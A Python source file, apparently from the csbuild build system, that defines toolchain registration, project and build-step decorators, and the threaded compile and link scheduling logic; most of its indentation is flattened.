projectSettings.currentProject.SetValue( "plistFile", copy.deepcopy( plistFile ) )
def SetSupportedArchitectures(*architectures):
"""
Specifies the architectures that this project supports. This can be used to limit
--all-architectures from building everything supported by the toolchain, if the project
is not set up to support all of the toolchain's architectures.
"""
projectSettings.currentProject.SetValue("supportedArchitectures", _utils.OrderedSet(architectures))
def SetSupportedToolchains(*toolchains):
"""
Specifies the toolchains that this project supports. This can be used to limit
--all-toolchains from building everything supported by csbuild, if the project
is not set up to support all of the toolchains.
"""
projectSettings.currentProject.SetValue("supportedToolchains", _utils.OrderedSet(toolchains))
def RegisterToolchain( name, compiler, linker, **customTools ):
"""
Register a new toolchain for use in the project.
:type name: str
:param name: The name of the toolchain being registered
:type compiler: class derived from :class:`csbuild.toolchain.compilerBase`
:param compiler: The compiler used in this toolchain
:type linker: class derived from :class:`csbuild.toolchain.linkerBase`
	:param linker: The linker used in this toolchain
	:param customTools: Any additional tool classes to instantiate and register with this toolchain, keyed by tool name
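	Example (MyCompiler and MyLinker are hypothetical classes derived from the bases above):
	csbuild.RegisterToolchain( "my-toolchain", MyCompiler, MyLinker )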
"""
class registeredToolchain(toolchain.toolchain):
def __init__(self):
toolchain.toolchain.__init__(self)
self.tools["compiler"] = compiler(self.shared)
self.tools["linker"] = linker(self.shared)
			toolsDict = dict(customTools)
			for toolName, tool in toolsDict.items():
				self.tools[toolName] = tool(self.shared)
# Format the name so that it can be used as part of its architecture command line option.
# This generally means replacing all whitespace with dashes.
toolchainArchString = name
toolchainArchString = toolchainArchString.replace(" ", "-")
toolchainArchString = toolchainArchString.replace(",", "-")
toolchainArchString = toolchainArchString.replace("\t", "-")
toolchainArchString = toolchainArchString.replace("\r", "") # Intentionally remove '\r'.
toolchainArchString = toolchainArchString.replace("\n", "-")
# Don't know how often it will occur, but if any quotes happen to be in the string, remove them.
toolchainArchString = toolchainArchString.replace('"', "")
toolchainArchString = toolchainArchString.replace("'", "")
toolchainArchString = toolchainArchString.strip("-") # Remove any dashes at the start and end of the string.
_shared_globals.alltoolchains[name] = registeredToolchain
_shared_globals.allToolchainArchStrings[name] = (toolchainArchString + "-architecture", toolchainArchString + "-arch")
projectSettings.currentProject.toolchains.update( { name : registeredToolchain() } )
projectSettings.currentProject.intermediateToolchains.update( { name : registeredToolchain() } )
projectSettings.currentProject.finalToolchains.update( { name : registeredToolchain() } )
def RegisterProjectGenerator( name, generator ):
"""
Register a new project generator for use in solution generation.
:type name: str
:param name: The name of the generator being registered
:type generator: csbuild.project_generator.project_generator
:param generator: The generator to associate with that name
"""
_shared_globals.allgenerators[name] = generator
_shared_globals.project_generators[name] = generator
def RegisterPlugin( pluginClass ):
	"""
	Register a plugin class with the current project. The plugin's build-step hooks will be run at the
	appropriate points during the build.
	:param pluginClass: The plugin class to register (see :mod:`csbuild.plugin`)
	"""
	projectSettings.currentProject.AddToSet( "plugins", pluginClass )
def Toolchain( *args ):
"""
Perform actions on the listed toolchains. Examples:
csbuild.Toolchain("gcc").NoPrecompile()
csbuild.Toolchain("gcc", "msvc").EnableWarningsAsErrors()
:type args: arbitrary number of strings
:param args: The list of toolchains to act on
:return: A proxy object that enables functions to be applied to one or more specific toolchains.
"""
toolchains = []
for arg in list( args ):
scope = projectSettings.currentProject._currentScope
if scope & ScopeDef.Self:
toolchains.append( projectSettings.currentProject.toolchains[arg] )
if scope & ScopeDef.Intermediate:
toolchains.append( projectSettings.currentProject.intermediateToolchains[arg] )
if scope & ScopeDef.Final:
toolchains.append( projectSettings.currentProject.finalToolchains[arg] )
return toolchain.ClassCombiner( toolchains )
def SetActiveToolchain( name ):
"""
Sets the active toolchain to be used when building the project.
On Windows platforms, this is set to msvc by default.
On Linux platforms, this is set to gcc by default.
This will be overridden if the script is executed with the --toolchain option.
:type name: str
:param name: The toolchain to use to build the project
"""
_shared_globals.selectedToolchains.add(name)
projectSettings.currentProject.SetValue("activeToolchainName", name)
#</editor-fold>
#<editor-fold desc="decorators">
scriptFiles = []
class Link(object):
	"""
	Declares a link dependency on another project: the declaring project will link the named project's output.
	The optional include/exclude lists restrict the toolchains and architectures the dependency applies to.
	"""
	def __init__(self, libName, scope = ScopeDef.Final, includeToolchains=None, includeArchitectures=None, excludeToolchains=None, excludeArchitectures=None):
self.libName = libName
self.scope = scope
self.includeToolchains = includeToolchains
self.includeArchitectures = includeArchitectures
self.excludeToolchains = excludeToolchains
self.excludeArchitectures = excludeArchitectures
class Src(object):
	"""
	Declares a build-order dependency on another project: the declaring project will not start building until the named project has finished.
	The optional include/exclude lists restrict the toolchains and architectures the dependency applies to.
	"""
	def __init__(self, libName, scope = ScopeDef.Final, includeToolchains=None, includeArchitectures=None, excludeToolchains=None, excludeArchitectures=None):
self.libName = libName
self.scope = scope
self.includeToolchains = includeToolchains
self.includeArchitectures = includeArchitectures
self.excludeToolchains = excludeToolchains
self.excludeArchitectures = excludeArchitectures
def scope( scope ):
	"""
	Decorator that runs the wrapped settings function under the given :ScopeDef: scope, so the settings it
	applies are inherited by intermediate and/or final dependents as requested.
	"""
	def wrap( func ):
oldScope = projectSettings.currentProject._currentScope
projectSettings.currentProject._currentScope = scope
func()
projectSettings.currentProject._currentScope = oldScope
return wrap
def _project_decorator( name, workingDirectory, depends = None, priority = -1, ignoreDependencyOrdering = False, autoDiscoverSourceFiles = True, prebuilt = False, shell = False ):
if not depends:
depends = []
if isinstance( depends, str ):
depends = [depends]
def wrap( projectFunction ):
if name in _shared_globals.tempprojects:
log.LOG_ERROR( "Multiple projects with the same name: {}. Ignoring.".format( name ) )
return
previousProject = projectSettings.currentProject.copy( )
projectFunction( )
newProject = projectSettings.currentProject.copy( )
newProject.key = name
newProject.name = name
newProject.workingDirectory = os.path.abspath( workingDirectory )
newProject.scriptPath = os.getcwd( )
newProject.scriptFile = scriptFiles[-1]
newProject.libDepends = []
newProject.libDependsIntermediate = []
newProject.libDependsFinal = []
newProject.srcDepends = []
newProject.srcDependsIntermediate = []
newProject.srcDependsFinal = []
newProject.autoDiscoverSourceFiles = autoDiscoverSourceFiles
newProject.prebuilt = prebuilt
newProject.shell = shell
for depend in depends:
if isinstance(depend, str):
depend = Link(depend)
if isinstance(depend, Link):
if depend.scope & ScopeDef.Self:
newProject.linkDepends.append(depend)
if depend.scope & ScopeDef.Intermediate:
newProject.linkDependsIntermediate.append(depend)
if depend.scope & ScopeDef.Final:
newProject.linkDependsFinal.append(depend)
elif isinstance(depend, Src):
if depend.scope & ScopeDef.Self:
newProject.srcDepends.append(depend)
if depend.scope & ScopeDef.Intermediate:
newProject.srcDependsIntermediate.append(depend)
if depend.scope & ScopeDef.Final:
newProject.srcDependsFinal.append(depend)
newProject.func = projectFunction
newProject.priority = priority
newProject.ignoreDependencyOrdering = ignoreDependencyOrdering
_shared_globals.tempprojects.update( { name: newProject } )
projectSettings.currentGroup.tempprojects.update( { name: newProject } )
newProject.parentGroup = projectSettings.currentGroup
projectSettings.currentProject = previousProject
return projectFunction
return wrap
def project( name, workingDirectory, depends = None, priority = -1, ignoreDependencyOrdering = False, autoDiscoverSourceFiles = True ):
"""
Decorator used to declare a project. linkDepends and srcDepends here will be used to determine project build order.
:type name: str
:param name: A unique name to be used to refer to this project
:type workingDirectory: str
:param workingDirectory: The directory in which to perform build operations. This directory
(or a subdirectory) should contain the project's source files.
	:type depends: list
	:param depends: A list of other projects. This project will not be linked until the dependent projects
	have completed their build process. Entries can be specified as either projName, Link(projName, scope), or Src(projName, scope);
	a bare projName will be converted to Link(projName, ScopeDef.Final).
	Link causes the declaring project to link this dependency's output.
	Src causes the declaring project to wait until this dependency finishes building before it starts its own build.
"""
return _project_decorator(name, workingDirectory, depends, priority, ignoreDependencyOrdering, autoDiscoverSourceFiles)
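# Example makefile usage of the project decorator (a minimal sketch; the project names,
# directories, and output settings are purely illustrative):
#
#	@csbuild.project( "myLib", "lib" )
#	def myLib( ):
#		csbuild.SetOutput( "myLib", csbuild.ProjectType.StaticLibrary )
#
#	@csbuild.project( "myApp", "app", depends = [ "myLib" ] )
#	def myApp( ):
#		csbuild.SetOutput( "myApp", csbuild.ProjectType.Application )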
def prebuilt( name, depends = None ):
	"""
	Decorator used to declare a prebuilt project. Prebuilt projects are not compiled; they only contribute
	link information to their dependents.
	"""
	return _project_decorator(name, "", depends, prebuilt = True)
def shellProject( name, workingDirectory, depends = None, autoDiscoverSourceFiles = True ):
	"""
	Decorator used to declare a shell project. Shell projects participate in dependency resolution but do not
	block their dependents' links the way normal projects do. See :func:`project` for parameter details.
	"""
	return _project_decorator(name, workingDirectory, depends, autoDiscoverSourceFiles = autoDiscoverSourceFiles, shell = True)
def projectGroup( name ):
"""
Specifies a grouping of projects. This will add scope to the global project settings, and will additionally be used
in solution generation to group the projects.
:type name: str
:param name: The name to identify this project group
"""
def wrap( groupFunction ):
if name in projectSettings.currentGroup.subgroups:
projectSettings.currentGroup = projectSettings.currentGroup.subgroups[name]
else:
newGroup = projectSettings.ProjectGroup( name, projectSettings.currentGroup )
projectSettings.currentGroup.subgroups.update( { name: newGroup } )
projectSettings.currentGroup = newGroup
previousProject = projectSettings.currentProject.copy( )
groupFunction( )
projectSettings.currentProject = previousProject
projectSettings.currentGroup = projectSettings.currentGroup.parentGroup
return wrap
def target( name, override = False ):
"""
Specifies settings for a target. If the target doesn't exist it will be implicitly created. If a target does exist
with this name, this function will be appended to a list of functions to be run for that target name, unless
override is True.
:type name: str
:param name: The name for the target; i.e., "debug", "release"
:type override: bool
:param override: If this is true, existing functionality for this target will be discarded for this project.
"""
def wrap( targetFunction ):
if override is True or name not in projectSettings.currentProject.targets:
projectSettings.currentProject.targets.update( { name: [targetFunction] } )
else:
projectSettings.currentProject.targets[name].append( targetFunction )
return targetFunction
_shared_globals.alltargets.add( name )
return wrap
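# Example makefile usage of the target decorator (a minimal sketch; the "profile" target
# name is purely illustrative):
#
#	@csbuild.target( "profile" )
#	def profile( ):
#		csbuild.SetOptimizationLevel( csbuild.OptimizationLevel.Speed )
#		csbuild.EnableProfiling( )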
def fileSettings( files, override = False ):
"""
Specifies settings that affect a single specific file
:type files: str or list[str]
:param files: The file or files to apply these settings to
	:type override: bool
	:param override: If this is true, existing functionality for these files will be discarded for this project.
"""
def wrap( fileFunction ):
fileList = files
if not isinstance(fileList, list):
fileList = [fileList]
for file in fileList:
file = os.path.normcase(os.path.abspath(file))
if override is True or file not in projectSettings.currentProject.fileOverrides:
projectSettings.currentProject.fileOverrides.update( { file: [fileFunction] } )
else:
projectSettings.currentProject.fileOverrides[file].append( fileFunction )
return fileFunction
return wrap
def architecture( archs, override = False ):
"""
Specifies settings for a specific list of architectures.
"""
def wrap( archFunction ):
archList = archs
if not isinstance(archList, list):
archList = [archList]
for arch in archList:
if override is True or arch not in projectSettings.currentProject.archFuncs:
projectSettings.currentProject.archFuncs.update( { arch: [archFunction] } )
else:
projectSettings.currentProject.archFuncs[arch].append( archFunction )
return archFunction
return wrap
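# Example makefile usage of the architecture decorator (a minimal sketch; the define is
# purely illustrative):
#
#	@csbuild.architecture( "x64" )
#	def x64( ):
#		csbuild.AddDefines( "BUILD_X64" )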
def prePrepareBuildStep( func ):
"""
	Decorator that creates a pre-prepare-build step for the containing project. Pre-PrepareBuild steps run just before the project
	begins preparing its build tasks.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("prePrepareBuildSteps", func)
return func
def postPrepareBuildStep( func ):
"""
	Decorator that creates a post-prepare-build step for the containing project. Post-PrepareBuild steps run just after the
	project completes its build preparation. This is the only place where running project.RediscoverFiles() has any
	appreciable effect.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("postPrepareBuildSteps", func)
return func
def preMakeStep( func ):
"""
Decorator that creates a pre-make step for the containing project. Pre-make steps run after all projects' preparation
steps have completed and their final chunk sets have been collected, but before any compiling starts.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("preMakeSteps", func)
return func
def postMakeStep( func ):
"""
Decorator that creates a post-make step for the containing project. Post-make steps run after all projects have
finished building and linking. This step will only run if the entire build process was successful.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("postMakeSteps", func)
return func
def preBuildStep( func ):
"""
Decorator that creates a pre-build step for the containing project. Pre-build steps run just before the project
begins compiling.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("preBuildSteps", func)
return func
def postBuildStep( func ):
"""
Decorator that creates a post-build step for the containing project. Post-build steps run after the project has
**successfully** compiled **and** linked.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("postBuildSteps", func)
return func
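# Example makefile usage of a post-build step (a minimal sketch; assumes the makefile
# imports os and shutil, and the destination directory is purely illustrative):
#
#	@csbuild.project( "myApp", "app" )
#	def myApp( ):
#		csbuild.SetOutput( "myApp", csbuild.ProjectType.Application )
#
#		@csbuild.postBuildStep
#		def copyOutput( project ):
#			shutil.copy2( os.path.join( project.outputDir, project.outputName ), "artifacts/" )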
def preLinkStep( func ):
"""
Decorator that creates a pre-link step for the containing project. Pre-link steps run after a successful compile of
the project, but before the project links.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("preLinkSteps", func)
return func
def globalPostMakeStep( func ):
"""
Decorator that creates a global post-make step that will only be executed once. Post-make steps run after all projects have
finished building and linking. This step will only run if the entire build process was successful.
Global build steps execute after all project build steps of the same type have completed.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take no arguments.
"""
_shared_globals.globalPostMakeSteps.add(func)
return func
def globalPreMakeStep( func ):
"""
Decorator that creates a global pre-make step that will only be executed once. Pre-make steps run after all projects' preparation
steps have completed and their final chunk sets have been collected, but before any compiling starts.
Global build steps execute after all project build steps of the same type have completed.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take no arguments.
"""
_shared_globals.globalPreMakeSteps.add(func)
return func
#</editor-fold>
_shared_globals.starttime = time.time( )
sys.stdout = log.stdoutWriter(sys.stdout)
_building = False
class _LinkStatus(object):
"""
Defines the current link status of a project.
"""
Fail = 0
Success = 1
UpToDate = 2
def _build( ):
"""
Build the project.
	This step handles:
	- Checking library dependencies.
	- Checking which files need to be built.
	- Spawning a build thread for each file that needs building.
"""
if _guiModule:
_guiModule.run()
built = False
global _building
_building = True
for project in _shared_globals.sortedProjects:
for chunk in project.chunks:
if project.activeToolchain.Compiler().SupportsDummyObjects():
objs = []
for source in chunk:
obj = _utils.GetSourceObjPath(project, source)
if not os.access(obj, os.F_OK):
objs.append(obj)
project.activeToolchain.Compiler().MakeDummyObjects(objs)
linker_threads_blocked = _shared_globals.max_linker_threads - 1
for i in range( linker_threads_blocked ):
_shared_globals.link_semaphore.acquire(True)
for project in _shared_globals.sortedProjects:
_shared_globals.total_compiles += len( project._finalChunkSet )
_shared_globals.total_compiles += _shared_globals.total_precompiles
_shared_globals.current_compile = 1
projects_in_flight = set()
projects_done = set()
pending_links = set()
pending_builds = _shared_globals.sortedProjects
for project in pending_builds:
for plugin in project.plugins:
_utils.CheckRunBuildStep(project, plugin.preMakeStep, "plugin pre-make")
_shared_globals.globalPreMakeSteps.add(plugin.globalPreMakeStep)
_utils.CheckRunBuildStep(project, project.activeToolchain.preMakeStep, "toolchain pre-make")
_shared_globals.globalPreMakeSteps |= project.activeToolchain.GetGlobalPreMakeSteps()
for buildStep in project.preMakeSteps:
_utils.CheckRunBuildStep(project, buildStep, "project pre-make")
for buildStep in _shared_globals.globalPreMakeSteps:
if _utils.FuncIsEmpty(buildStep):
continue
log.LOG_BUILD( "Running global pre-make step {}".format(_utils.GetFuncName(buildStep)))
buildStep()
_shared_globals.starttime = time.time( )
_linkThread.start()
def ReconcilePostBuild():
LinkedSomething = True
while LinkedSomething:
LinkedSomething = False
for otherProj in list( projects_in_flight ):
with otherProj.mutex:
complete = otherProj.compilationCompleted
if complete >= len( otherProj._finalChunkSet ) + int(
otherProj.needsPrecompileC ) + int(
otherProj.needsPrecompileCpp ):
totaltime = (time.time( ) - otherProj.starttime)
minutes = math.floor( totaltime / 60 )
seconds = math.floor( totaltime % 60 )
log.LOG_BUILD(
"Compile of {0} ({3} {4}) took {1}:{2:02}".format( otherProj.outputName, int( minutes ),
int( seconds ), otherProj.targetName, otherProj.outputArchitecture ) )
otherProj.buildEnd = time.time()
projects_in_flight.remove( otherProj )
if otherProj.compilationFailed:
log.LOG_ERROR( "Build of {} ({} {}/{}) failed! Finishing up non-dependent build tasks...".format(
otherProj.outputName, otherProj.targetName, otherProj.outputArchitecture, otherProj.activeToolchainName ) )
otherProj.state = _shared_globals.ProjectState.FAILED
otherProj.linkQueueStart = time.time()
otherProj.linkStart = otherProj.linkQueueStart
otherProj.endTime = otherProj.linkQueueStart
continue
okToLink = True
if otherProj.reconciledLinkDepends:
for depend in otherProj.reconciledLinkDepends:
if depend not in projects_done:
dependProj = _shared_globals.projects[depend]
if not dependProj.shell and not dependProj.prebuilt:
okToLink = False
break
if okToLink:
_link( otherProj )
LinkedSomething = True
projects_done.add( otherProj.key )
else:
log.LOG_LINKER(
"Linking for {} ({} {}/{}) deferred until all dependencies have finished building...".format(
otherProj.outputName, otherProj.targetName, otherProj.outputArchitecture, otherProj.activeToolchainName ) )
otherProj.state = _shared_globals.ProjectState.WAITING_FOR_LINK
pending_links.add( otherProj )
for otherProj in list( pending_links ):
okToLink = True
for depend in otherProj.reconciledLinkDepends:
if depend not in projects_done:
dependProj = _shared_globals.projects[depend]
if not dependProj.shell and not dependProj.prebuilt:
okToLink = False
break
if okToLink:
_link( otherProj )
LinkedSomething = True
projects_done.add( otherProj.key )
pending_links.remove( otherProj )
while pending_builds:
theseBuilds = pending_builds
pending_builds = []
		for project in theseBuilds:
			# Defer this project until all of its source dependencies have finished building.
			if any( depend not in projects_done for depend in project.srcDepends ):
				pending_builds.append( project )
				continue
			projects_in_flight.add( project )
projectSettings.currentProject = project
project.starttime = time.time( )
			for plugin in project.plugins:
				_utils.CheckRunBuildStep(project, plugin.preBuildStep, "plugin pre-build")
_utils.CheckRunBuildStep(project, project.activeToolchain.preBuildStep, "toolchain pre-build")
for buildStep in project.preBuildSteps:
_utils.CheckRunBuildStep(project, buildStep, "project pre-build")
log.LOG_BUILD( "Building {} ({} {}/{})".format( project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
project.state = _shared_globals.ProjectState.BUILDING
project.startTime = time.time()
if project.precompile_headers( ):
for chunk in projectSettings.currentProject._finalChunkSet:
#not set until here because _finalChunkSet may be empty.
project._builtSomething = True
chunkFileStr = ""
if chunk in project.chunksByFile:
chunkFileStr = " {}".format( [ os.path.basename(piece) for piece in project.chunksByFile[chunk] ] )
elif chunk in project.splitChunks:
chunkFileStr = " [Split from {}_{}{}]".format(
project.splitChunks[chunk],
project.targetName,
project.activeToolchain.Compiler().GetObjExt()
)
built = True
obj = _utils.GetSourceObjPath(projectSettings.currentProject, chunk, sourceIsChunkPath=projectSettings.currentProject.ContainsChunk(chunk))
if not _shared_globals.semaphore.acquire( False ):
if _shared_globals.max_threads != 1:
log.LOG_INFO( "Waiting for a build thread to become available..." )
_shared_globals.semaphore.acquire( True )
ReconcilePostBuild()
if _shared_globals.interrupted:
Exit( 2 )
if not _shared_globals.build_success and _shared_globals.stopOnError:
log.LOG_ERROR("Errors encountered during build, finishing current tasks and exiting...")
_shared_globals.semaphore.release()
break
if _shared_globals.times:
totaltime = (time.time( ) - _shared_globals.starttime)
_shared_globals.lastupdate = totaltime
minutes = math.floor( totaltime / 60 )
seconds = math.floor( totaltime % 60 )
avgtime = sum( _shared_globals.times ) / (len( _shared_globals.times ))
esttime = totaltime + ((avgtime * (
_shared_globals.total_compiles - len(
_shared_globals.times ))) / _shared_globals.max_threads)
if esttime < totaltime:
esttime = totaltime
_shared_globals.esttime = esttime
estmin = math.floor( esttime / 60 )
estsec = math.floor( esttime % 60 )
log.LOG_BUILD(
"Compiling {0}{7}... ({1}/{2}) - {3}:{4:02}/{5}:{6:02}".format( os.path.basename( obj ),
_shared_globals.current_compile, _shared_globals.total_compiles, int( minutes ),
int( seconds ), int( estmin ),
int( estsec ), chunkFileStr ) )
else:
totaltime = (time.time( ) - _shared_globals.starttime)
minutes = math.floor( totaltime / 60 )
seconds = math.floor( totaltime % 60 )
log.LOG_BUILD(
"Compiling {0}{5}... ({1}/{2}) - {3}:{4:02}".format( os.path.basename( obj ),
_shared_globals.current_compile,
_shared_globals.total_compiles, int( minutes ), int( seconds ), chunkFileStr ) )
_utils.ThreadedBuild( chunk, obj, project ).start( )
_shared_globals.current_compile += 1
else:
projects_in_flight.remove( project )
log.LOG_ERROR( "Build of {} ({} {}/{}) failed! Finishing up non-dependent build tasks...".format(
project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
with project.mutex:
for chunk in project._finalChunkSet:
project.fileStatus[os.path.normcase(chunk)] = _shared_globals.ProjectState.ABORTED
_shared_globals.total_compiles -= len(project._finalChunkSet)
project.linkQueueStart = time.time()
project.linkStart = project.linkQueueStart
project.endTime = project.linkQueueStart
project.state = _shared_globals.ProjectState.FAILED
if not _shared_globals.build_success and _shared_globals.stopOnError:
break
#Wait until all threads are finished. Simple way to do this is acquire the semaphore until it's out of
# resources.
for j in range( _shared_globals.max_threads ):
if not _shared_globals.semaphore.acquire( False ):
if _shared_globals.max_threads != 1:
if _shared_globals.times:
totaltime = (time.time( ) - _shared_globals.starttime)
_shared_globals.lastupdate = totaltime
minutes = math.floor( totaltime / 60 )
seconds = math.floor( totaltime % 60 )
avgtime = sum( _shared_globals.times ) / (len( _shared_globals.times ))
esttime = totaltime + ((avgtime * (_shared_globals.total_compiles - len(
_shared_globals.times ))) / _shared_globals.max_threads)
if esttime < totaltime:
esttime = totaltime
estmin = math.floor( esttime / 60 )
estsec = math.floor( esttime % 60 )
_shared_globals.esttime = esttime
log.LOG_THREAD(
"Waiting on {0} more build thread{1} to finish... ({2}:{3:02}/{4}:{5:02})".format(
_shared_globals.max_threads - j,
"s" if _shared_globals.max_threads - j != 1 else "", int( minutes ),
int( seconds ), int( estmin ), int( estsec ) ) )
else:
log.LOG_THREAD(
"Waiting on {0} more build thread{1} to finish...".format(
_shared_globals.max_threads - j,
"s" if _shared_globals.max_threads - j != 1 else "" ) )
ReconcilePostBuild()
_shared_globals.semaphore.acquire( True )
if linker_threads_blocked > 0:
_shared_globals.link_semaphore.release()
linker_threads_blocked -= 1
if _shared_globals.interrupted:
Exit( 2 )
#Then immediately release all the semaphores once we've reclaimed them.
#We're not using any more threads so we don't need them now.
for j in range( _shared_globals.max_threads ):
if _shared_globals.stopOnError:
projects_in_flight = set()
_shared_globals.semaphore.release( )
ReconcilePostBuild()
if projects_in_flight:
log.LOG_ERROR( "Could not complete all projects. This is probably very bad and should never happen."
" Remaining projects: {0}".format( [p.key for p in projects_in_flight] ) )
if pending_links:
log.LOG_ERROR( "Could not link all projects. Do you have unmet dependencies in your makefile?"
" Remaining projects: {0}".format( [p.key for p in pending_links] ) )
for p in pending_links:
p.state = _shared_globals.ProjectState.ABORTED
_shared_globals.build_success = False
for proj in _shared_globals.sortedProjects:
proj.save_md5s( proj.allsources, proj.allheaders )
if not built:
log.LOG_BUILD( "Nothing to build." )
_building = False
global _linkCond
global _linkMutex
with _linkMutex:
_linkCond.notify()
log.LOG_THREAD("Waiting for linker tasks to finish.")
_linkThread.join()
if not projects_in_flight and not pending_links:
for project in _shared_globals.sortedProjects:
for plugin in project.plugins:
_utils.CheckRunBuildStep(project, plugin.postMakeStep, "plugin post-make")
_shared_globals.globalPostMakeSteps.add(plugin.globalPostMakeStep)
_utils.CheckRunBuildStep(project, project.activeToolchain.postMakeStep, "toolchain post-make")
_shared_globals.globalPostMakeSteps |= project.activeToolchain.GetGlobalPostMakeSteps()
for buildStep in project.postMakeSteps:
_utils.CheckRunBuildStep(project, buildStep, "project post-make")
for buildStep in _shared_globals.globalPostMakeSteps:
if _utils.FuncIsEmpty(buildStep):
continue
log.LOG_BUILD( "Running global post-make step {}".format(_utils.GetFuncName(buildStep)))
buildStep()
compiletime = time.time( ) - _shared_globals.starttime
totalmin = math.floor( compiletime / 60 )
totalsec = math.floor( compiletime % 60 )
log.LOG_BUILD( "Compilation took {0}:{1:02}".format( int( totalmin ), int( totalsec ) ) )
_shared_globals.buildFinished = True
return _shared_globals.build_success
_linkMutex = threading.Lock()
_linkCond = threading.Condition(_linkMutex)
_linkQueue = []
_currentLinkThreads = set()
_linkThreadMutex = threading.Lock()
_recheckDeferredLinkTasks = False
def _link( project, *objs ):
"""
Linker:
Links all the built files.
	Accepts an optional list of object files to link; if this list is not provided, the auto-generated
	list created by build() is used instead.
	If nothing was built, this function also checks the modified times of all the required libraries to see
	whether we need to relink anyway, even though nothing was compiled.
"""
global _linkQueue
global _linkMutex
global _linkCond
project.state = _shared_globals.ProjectState.LINK_QUEUED
project.linkQueueStart = time.time()
with _linkMutex:
_linkQueue.append( (project, list(objs)) )
_linkCond.notify()
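#The append/notify hand-off above is a standard condition-variable producer pattern; the consumer side
#lives in _linkThreadLoop() below. A minimal standalone sketch of the same idea (names are illustrative):
#
#	import threading
#	queue = []
#	mutex = threading.Lock()
#	cond = threading.Condition( mutex )
#
#	def producer( item ):   #mirrors _link()
#		with mutex:
#			queue.append( item )
#			cond.notify()
#
#	def consumer():         #mirrors _linkThreadLoop()
#		with mutex:
#			while not queue:
#				cond.wait()   #releases the mutex while blocked
#			return queue.pop( 0 )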
def _performLink(project, objs):
project.linkStart = time.time()
for plugin in project.plugins:
_utils.CheckRunBuildStep(project, plugin.preLinkStep, "plugin pre-link")
_utils.CheckRunBuildStep(project, project.activeToolchain.preLinkStep, "toolchain pre-link")
for buildStep in project.preLinkSteps:
_utils.CheckRunBuildStep(project, buildStep, "project pre-link")
project.ResolveFilesAndDirectories()
project.activeToolchain.SetActiveTool("linker")
starttime = time.time( )
output = os.path.join( project.outputDir, project.outputName )
log.LOG_LINKER( "Linking {0}...".format( os.path.abspath( output ) ) )
if not objs:
for chunk in project.chunks:
hasChunk = False
if not project.unity:
chunkObj = _utils.GetChunkedObjPath(project, chunk)
else:
chunkObj = _utils.GetUnityChunkObjPath(project)
if project.useChunks and not _shared_globals.disable_chunks and os.access(chunkObj , os.F_OK):
objs.append( chunkObj )
hasChunk = True
if not hasChunk or project.activeToolchain.Compiler().SupportsObjectScraping():
objsToScrape = []
				if isinstance( chunk, list ):
for source in chunk:
obj = _utils.GetSourceObjPath(project, source)
if os.access(obj , os.F_OK):
objs.append( obj )
if source in project._finalChunkSet:
objsToScrape.append( obj )
elif not hasChunk or project.activeToolchain.Compiler().SupportsDummyObjects():
log.LOG_ERROR( "Could not find {} for linking. Something went wrong here.".format(obj) )
return _LinkStatus.Fail
else:
obj = _utils.GetSourceObjPath(project, chunk)
if os.access(obj , os.F_OK):
objs.append( obj )
						if chunk in project._finalChunkSet:
objsToScrape.append( obj )
elif not hasChunk or project.activeToolchain.Compiler().SupportsDummyObjects():
log.LOG_ERROR( "Could not find {} for linking. Something went wrong here.".format(obj) )
return _LinkStatus.Fail
if hasChunk and objsToScrape:
project.activeToolchain.Compiler().GetObjectScraper().RemoveSharedSymbols(objsToScrape, chunkObj)
if not objs:
return _LinkStatus.UpToDate
for obj in project.extraObjs:
log.LOG_INFO("Adding extra link object {} to link queue".format(obj))
if not os.access(obj, os.F_OK):
log.LOG_ERROR("Could not find extra object {}".format(obj))
objs += project.extraObjs
if not project._builtSomething:
if os.access(output , os.F_OK):
mtime = os.path.getmtime( output )
for obj in objs:
if os.path.getmtime( obj ) > mtime:
#If the obj time is later, something got built in another run but never got linked...
#Maybe the linker failed last time.
#We should count that as having built something, because we do need to link.
#Otherwise, if the object time is earlier, there's a good chance that the existing
#output file was linked using a different target, so let's link it again to be safe.
project._builtSomething = True
break
#Even though we didn't build anything, we should verify all our libraries are up to date too.
#If they're not, we need to relink.
			for libraryLocation in project.libraryLocations:
				if os.path.getmtime( libraryLocation ) > mtime:
					log.LOG_LINKER(
						"Library {0} has been modified since the last successful build. Relinking to new library."
						.format( libraryLocation ) )
project._builtSomething = True
for dep in project.reconciledLinkDepends:
depProj = _shared_globals.projects[dep]
if not depProj.prebuilt and not depProj.shell and depProj.state != _shared_globals.ProjectState.UP_TO_DATE:
log.LOG_LINKER(
"Dependent project {0} has been modified since the last successful build. Relinking to new library."
.format( depProj.name ) )
project._builtSomething = True
#Barring the two above cases, there's no point linking if the compiler did nothing.
if not project._builtSomething:
if not _shared_globals.called_something:
log.LOG_LINKER( "Nothing to link." )
return _LinkStatus.UpToDate
if not os.access(project.outputDir , os.F_OK):
os.makedirs( project.outputDir )
#On unix-based OSes, we need to remove the output file so we're not just clobbering it
#If it gets clobbered while running it could cause BAD THINGS (tm)
#On windows, however, we want to leave it there so that incremental link can work.
